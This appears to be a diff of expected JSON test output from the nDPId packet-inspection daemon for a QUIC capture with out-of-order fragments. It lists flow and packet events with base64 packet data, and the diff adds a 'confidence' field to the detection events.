 02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1621433521961,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433521961,"pkt":"AAAAAAAAAAEASYHhCABFAAViy8RAAH4RV9OokEAFEOjadfy8AbsFThT+z\/8AAB0IhJNYKtANuoMANwBQeqOywn67qncKSnTvuagILGVnNcalwuzGeiHpkW\/r3QudQ1Xg+atf32S0lvogd+2\/QThXrAhE\/UcbE6\/9d3ne8M3mBUbLc5y01PqU2r3V84i6i2XGKABZLB+Bshg3DGbuuyaaRbJCJtO6TLBrd9b6D0pWzrZ8i\/Gz8PAIyMOtI5BQl03yZpQuNeBtefp5qB7VZ9vAjNbT9Fi4jMJzpK4LOjIjHvho5UD9A1tQPssWUuiaB6ShmA41Ky2YyAUYb6Vh9rcHTQmUf36RXRjnMENcqSJ0txZ5HLa+JL\/wc7MLe4cFuMGhbo5QOrIDZl0OqxsRLbUuyHXXUj9iT0oZwwV9OPcMhzRgBCvFYPYmfISQRYW788jLzx1jI6Om66CAeI+GlZoG8XjCWvwTBZh4\/jd+ih5NAhEs\/yPoFHJAITJIoFzfVRs\/ZlaeaD21dhSdkLyQXvL6YrShajAQAL8QQuvvPxp1O9trw\/J1Y0yCHlbqft4HIR8bieoeKqFBtn8Vf4OzAvdIKL73M4BelKj2NgPZYdKz8+ZqUObz8td1TnEc2GZAidUp2ZVWI5XtiTBVv6\/1haOTwC\/f72jS66IjYphHkAjFY9qrDEJPRir2QNSQmatmWbaYhNe+qzzpKOsUSXAhbo1oQcAl+l2H9vJ\/DIQa\/AxSESBrwxGM4fWVLKqEAfMznZCtqu5fIZYleZVlEdE5C6lkvCY2W3xT+YJ1bOncdsHPT\/WGTsfc2kcqrsadebK7YP96vtKb5\/Kwjr0TCYEIvC8vfon2QAbzWY\/JCGhSEYUqb+8HgxwXZ9GWYITX\/BiqiLCdU8Aq6m\/J2oBNQp41WFXol9NeIYQ\/ENO\/iD4I\/DEE\/++\/78B3gyY1sn1rZXJOK0OaZecB3oIp5CHb8DPBBomL5i+kCg55mQYZXdBZu+\/tPycOr6KZl91KRXD7Z7TalELPSIUYpOBkmxHSZ2pvbUBnFHUY\/pw8Iwss0KbgupzZx7PD0GBpeEIyl45N0\/CmlN9QuyhgtpFSdG76LgGZLszlzyntz5P0kwUusECVbIv+39Djz82FK54YD4N+JgQBI2jcM5Zrwk2YhbYd9NpBrDQWUXA9bJsyou+uE1gnkTh+CuICnZY1UDepbEYOVkXeD6R6MgAu0d03kX9pBp4HBB2snNUvQ2Oyw65UsJhUcink0Bfa6N1+jzB8j4NevywJoM\/frbsYzOsqLw3giaa6WuLFmKpE+IZ10TEjlyFlcukcQlZ+NNObDfykNCzzBy0AcMVQaUSbjFM9ZqN+w532wfhRNhL\/F83rzAuxIgJ0n7kuWgx1Jmzauv+GuAQAe\/Uw+HEgG6V+kg9JoZLVZYLKoIXp7Z\/RGXpWG6+88\/QUBnYEjIVJi3NA4jv6spgUguU8hnlk0dwaGaTgDd+E3pAJh1qiy6G4I6\/yNiu8puzdQ2UZXW5DSLwiSIdluiR43lhltbHf\/kT4ogbkuhAZhjh\/hPFlOMFqyWyJNLdSoLKPFvtXO5THZjGcQf64KDQ+Abf7vsxCS6V\/yIHUSA+iidaY5kvUUh1iHjGk0QAUUnvwTyQXCrz5Lw8M0X\/+XryPxtPTET5dAXJHe7twTSv+4wTKnufI1RxQCzNHd\/d8PrkscC7FBMhp5+jPQuyuCQJrAnnf4c5Q9OIbgJM125\/9n8YnDbNwguEGB0mPAkvI3jKFLHb1CFQcgY8kEl\/0mjy6bPZdm5nVzmX0ouDvUmiEZcGPawl5Bk3IHTCTM4+6WoZMUTAFfn6ItnEi7vfqWVc34jJvA3AQ"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1621433567521,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433567521,"pkt":"AAAAAAAAAAEAS1QMCABFAAViYR1AAH4R+pqokEAFCUGp\/O4IAbsFTmqmwP8AAB0IrIdSuCmx8q8ANwCDdz03IhzUFn1L2Cnpzs\/TwSm2cofJpAX1JkTV3tCerbt47eBb\/tUYyv\/WG3oeaZXUGjSRmm5E\/S\/GHWDf3uofFcje7iOy\/NYB5qLognHXVD5g33k5Wi4OmgM+Ahmi4KhHeG3d2\/spKvCfjAjis75+5oGyetUb7SiO95JzfsedF3RaUE6Kj3rwNnMmnCLJJ1LfhDj1pFKjuI2YJh+71nHR\/BoSscicrqHnjNU+Kt5JysJR0+jE4LPT9l2mVbtuLkLis0xTseEMrQ66AbQ4UFQMzyqQWI6Ys9FFItz+0act2NE2Wbofw\/Lrumq\/k5f6prAdUO5v4cjZt\/R7aWcFen8a7KkWTJ\/7yg4CnjBGZeWmAF\/5X52U3x\/RCCkPoodlYLAoeE7zSZyzafp9Vs3xFNlJ9K08Ckfsw+JGyo11cIH+HtRX65c3vvT6RM+bJMwm4UScJkC6c7MPFESBou22UrxOHjl8NrD0kEu\/qLl4tdQbrTpkmURNF2JKrG1jx1\/Vfcu5uH+lsNbc4u2wpjBtpNr8b07\/1E6ftbBeGWLBOlfhvQxQUPiyD5FRgm3uDcodf1gX7fecwIzaijpGJiX6c2KBmWcNDAQ\/RbOf9+2e76hRJtul2\/BURpdz9zqqRcD4sx424KomOinx8opVJjXft4bXUEWmwuefm1\/MbxOXPv2RyHg9XMH3qoObK7PP8PiRDpbbi6LB0oS1AIUBop\/TsnEOwwab4fl60FNiCev7ICz8OTrnAs6or6No9QC4mHJiNDT\/A5vVLmzT+Z9Dqu6BSr\/JaA6a6DJxfKrQLEYyFN+mAQST11uNp+VnLp1My1clYT++rNpJ2L59DkZaHZMZObQn4ik6O5C5VTnjBEObmR92eddNMuyKx5Kcg3EUAmOCeW6r2JGIl\/IhqsZitb1a2D0s80k4oX7Mvtlc4SQUaT7Qoy9cxZgVr3MS2h5r3nBhDjmOzclfK29evsEafcbJ8vHLvuDQLmwUbuWeYZPoiyIhQ9vr3rKz\/vd4UPl9YGc+ZFcosYc4+tF2ZvXLoV44zl5Hn+JUXSAMG8rfoE5RFiZCNdNSnotUGTuB8Lo8zqSeIICZx9qwBhwg0RBlSWK21bfhv0V6bO9uXd+SDA46Wuo9rvFwnraBKcacSoVBqqZ6NGGOXQX3CZ0UnZskQ2Xh9lq7c+9mbhD+uHkgeQ59u9+pCOoymabTpJz40KiLhh8cpE9UupFG3Btt\/mF\/tKjiDmpak0XaH5p715g4CskmYYeD92tSYiV2pxtPeSRFzREp31JbFciPWTWGHAynBoYesEZ31n6hzAN8xZIjFGAvCt9mogpjeOLZJ7T6QB+DXmTonvgfoavnlxnuqRqgiv2cdSaHzS1VthMln+XrEc6vIeLHjdmGTvxC4AfsHPWXQIScQ1dgnB39QlH9QGb+UXoJzINdUC7cxDDD1xWXlxqErv9pLj\/8syL\/kpqf0cAEb9f64EjRsyus6nZBGadcNgi1Md7ZoW1HGHML8j\/VyYIyJ1h7a+uvD3tW2ObzdNNh76C4O7RQWUO8ZVim2RcdZDeVvKTfU9dvyIagWxbYngJIGWUFxc+bA6nkUtX80ozt8+iMKvMyzsIr5C1WAgFhm\/JX2pUDX72XRGljQ99hW8WgvHx1zqZrH1LJ+aVfz7ij\/XG14HFhuepiATRHhb90pWV4gDy4BiWtZbCYyogbxOy35IER+o2RQvYWxiFGjGpj26HCJi40rj7HUSLn3oSMIhCgp0XQZUgssWXFY06WovWc+\/OK\/KLsjtKK"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1621433588411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433588411,"pkt":"AAAAAAAAAAEAz315CABFAAVi2sJAAH4Rh2SokEAFFgyWwuo9AbsFTrBryP8AAB0INSLhPL22UxQAAEU0dnb6uZhq1t6Zw3kr2pvHyfNWBxJD9W9s2zTRbPt+j3sYHVqGaibagTvObqxr8L7RMTtZH2xjRCWpCspX2XXuq+FXnTIfCwzq0R8bYQN7af9gvVLHPCvoe4LlWn1tEH6m0BTvrXq32km0YOpGp8mBDhiXp58UFczWic\/LDA0x6fF2n4YNtLE4Z2lMWFYhTTmuDLcKfFKATGaEQDjMewCgDLW4FqXB4m54SdcTcA\/dFOpbB1LCJ0YhH7hBJsrsRX7AF75ed76PrLag927ZRPEw3QiemYlDHW\/GgtF2bnMq6BMjp43+PZDDTs8Lw6sSJLk5j+j7binjYxfhzKvS9t5LIcp5cq8WQfdQfqbOCH+EpKFBTJXUATHM0GqFbPOFEWoTNdoLFZJCt0RlhQ2aFEhPRfofdgGmwmNcj6SQWX34PWjMe+xGvvQbWJbXfEiSpzsQw4qDOngUbAppNhq8yhTP7TLB+dKj0\/0j7CCnhGjf5VTlM4l8pSQLDnxJSczvPia0OmU+mYdzwvo0EOBr8AklCW7iLYW8dS2cmM0rlDa0ecqvTJ1VYOrB1S75Bz\/6V6+Hd7atab6h1vwSF2pFzXYcnqRiAinW\/VuSyg8KFFRr4Ybp5EzzwavSR2SInrndIzHlQgZhYkQhMHquBj5pApzCV3CuafdgWqruaCZexHIxHUdqmNN3yoqhpORch4AucgZXsQNNzu61Oune7H9O4MZHSTbLB19LCWWax1HzoFFeIyd+5XmDm8mqPBGBox1uxXAnJKM6+GXHpB2V+FVVww180yqLX4GanOJnfIFeIsn4XBJnYIAP18i9WhsbmRQWzl2XXYGFoRgkXkK1O+vGgPHV0EwDCUVaRhM2Rp+mvnnekeQws42lHMDRRxro+Eu9Ix0dsSJSRu5aFrroBpy3BPqsFCWb6M1EO0ZkiSuyMzMhMajOdUGCUna3gRiqvWtnMAbujUIPEq4PxN703lFKCAwIzIQNpwUh8mhLfFhAoyZhTjLup4KwhbKLFvYtKH0KHuLzpWQoBg9RYsqdtULI2+oQT2xHT99uhQc+dCK2nB0\/AJUbz91vXqq4Z+yTLK3qj+zNjQD0SHuOj18j+U37Pv7n6hwnuYzJKut5HNbT2mS5c\/00J82pn1UFjkHTJlZViBRbamRBCYCrX8FlJMJSeYHxtaGSD2LMbKIo8ecS2LrRVpGzwk0uo07Mlv9SeXRRtFhMhL8QJj7Ppv4crbwmWUJlFStoLO6iJRltLQK2Pl5JTkCISdw7ai8hmpPrQNR1gTuhnQ5\/GrIbz\/Hn59i+FyKiHMbjD3uzIGGIjeAdtBo03OGEL7XqBQA6NjJbG6W4THKFVaoUguo11P+g8z1hQF6OsY4EIS1M4hIImra0sUYy8Djc\/GGHsR0aEhjb1R4SiR+O9eiEtlxe1RT0g5rqIVSMhzdOU4wPWZDmrYaLl5hJ7phEqFGfgb6lrciOSZltZTNxTFq1zP4\/a6FEXS7CWMcJ7gX6XCBKUdUEBZvF6VAhczRd86bNCG2G0yjbnySI5sJBiFiizMdJaTuboXWehh73WfYET2wCS2TQ5Sg3Fpi\/2mK9dgxsZor0IxYLcaR+pvqa9krSP1h\/W+5Yc0W0Il09dN1RybZXko2cOc4Lfkq3Q0OvSfG5Ch6ZniiOz6DPWiFOkZUz2wi4NdBirItgeWcbhu2bR2McE74iWO9Bzd+fUd3fpaJcOg9NgCJg79T+rFXw2qinlYZGKvc14iIcpyM1OlOVLiWgsVNddHQTUfoocRRE+Quu"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1621433648984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433648984,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+9FAAH4RFzaokEAFcfqJ8\/y1AbsFTvvUzP8AAB0IOGOQBfKCbj0ANwA\/voO+XXx9UNRzF\/PVLqUQmnVcfbJaFy+44m9Th\/J0D8vGDxgnE0b3my68fY4VhoH7ylldwCdE\/cIKBj8Q8msGVTF\/lZRPFcYyu4rQA4dMkmJLGh8h4hcVJXYlyXw0HxsVsRXBSCaH9pcz5MYJT0N8d\/QHoWIhJXtTq2A4a7329H7ZCy\/2hiheF\/XWiSc4pxmO9Ynh+JN2vvZnWdzm0q82\/5WdIhtH6DKNLW7\/XztT2A8BgoGu1165fwnnJttnCnp7MC7ceEZdqQcpJJ9S5BIzGJvI47OWUy\/O+A7cuxtRd80Baj5eUgykqLnUlMco5qWUXbGJ3qeG56zhiw2ILgjT7Bcuxpku4m9iswOoWD9e++B9OG3l4Nl0B6il9OgM9B6djMPEZaQ\/7P0eLCfrf8N1EK8IU+jTARRnjz11uoVbKvy1X354Ysm\/cfeR1fvYJ8g2GiyorZy5vRdiDqVcxw9hR+rNVIThkd9jHbU6NaUET2Zmcrhn0oU\/AQNeqrzoZrD0wkusdBqHE7Oy7ZP3iS2driLZ2Ic4Alz7LOyyp85qJ87V9cHDrhWW0V\/LheIEH23t7AEDMI2gPEDikZlOkiojcHtGj6V3+8VwA1VBAVbh6C2nQb7oWJn4psrNAUumMXN\/5bdg6Au5NE9nJBs2GYp2MzdKptvsKDmxm6J8MjGuWMQCrFOGnhGPYmsufDERoYla\/wIXOqNo8R\/FJFxzNp3PwXo7ZdrQ73XzNwHSr9ffXKXimX21O1SWpQHDR\/RbdX1vZUr3Lh7pfNbx6rH7OmcLXV99oY2AQ6e8oc11SSL+ZdlBq0HLriiqfnA7CcVCdmD6jwEIQhCXdiNp2REzSEls5BEEPv8qRmwUQhOspQKayIHnIFw4XLXOua7WKV89\/vWuyJiksgmRtispubeUmTZoRJOF5\/jnh38nkBft2hu59mNNnWRGPvIy19bc0cxeWlZ4oo6nA9PJSZrQOdeW\/rD5ea8+DflUeQgYwFBI1S1PmVVqn6wiLMuaN3KohpzaQ3XgqrMrhPL05TT+tnokrX8jZ67X0mBu4DfS\/lggH6sBExWEAFyohWoqxhN0lUtYWZxgsnjiG+zXzgkP9ZtYeUvbNuzU6A5q3kVffXh28T+8yra1UAY4vmoeH\/QjLFtQVcEqveGRLBBG1l5o0fUNpUtnBrmmkZGfWY8JzXpI0KnKiHip4fBG0IQd+Q2bQOSO\/Udo4tFpVnmlDgeOeYmyrnrCqgC0cHv\/XR5E73gV1kjRoXxPvXxp\/pzGER9dhbxukOJbOd+VrD3OKeWSvoGbaNv3kYyanEP88AWW\/Bf2lDp7\/uZ7ngQLGve59K09TJ\/VxfxlMpRy29Y9kICc+sz8POsOp1zPo8X3lv4KDjtiGPrF4cogmdW+gz\/1Rx8RTv8nIGkGcj+GVFdIFzhqjZlaM+tlw+V5CFsnIZ58RzZR6PY1G0cLuEeCNRKseDLy2xunVcw0reIDCM\/BTmBGYOUScCRjBtpioVUlizTJN63ofb24jOlXZTsMyrT5MJJU6Slp9jrbFIgBY+6oR5a2h\/33BA9ep\/j6lsrwpd8UjkvRh76vxWRquNFGDZEA\/nnCBtRlZ9XDeCRoVW5+pY+5AmH2BOq5S+1kF52Jn+8edM7qfDOmmPZCwuDrVPEFHpbn96ryrPI4Qt9pbBcq2Z69uLwP\/ZTNn2joerZUg8Hl4cFuZ6ooBq6byB92bCiYOv3FnN\/Mx0lMa5Ean6QjpWh6xfjOoz2RFyP71l9S1BlUPEZhl3HfYvAeLR1G"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
